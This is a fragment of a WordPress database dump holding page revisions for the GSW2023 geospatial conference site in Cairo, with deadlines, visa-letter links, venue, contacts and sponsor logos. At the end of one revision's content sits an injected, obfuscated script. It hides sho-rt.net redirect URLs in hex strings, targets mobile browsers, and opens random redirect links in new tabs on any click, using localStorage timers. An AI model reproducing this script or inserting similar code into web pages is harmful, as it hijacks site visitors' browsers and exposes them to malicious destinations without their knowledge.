main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:14:04','2023-08-16 00:14:04','',3066,'https://gsw2023.com/?p=5239',0,'revision','',0),
(5240,1,'2023-08-16 00:16:39','2023-08-16 00:16:39','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" 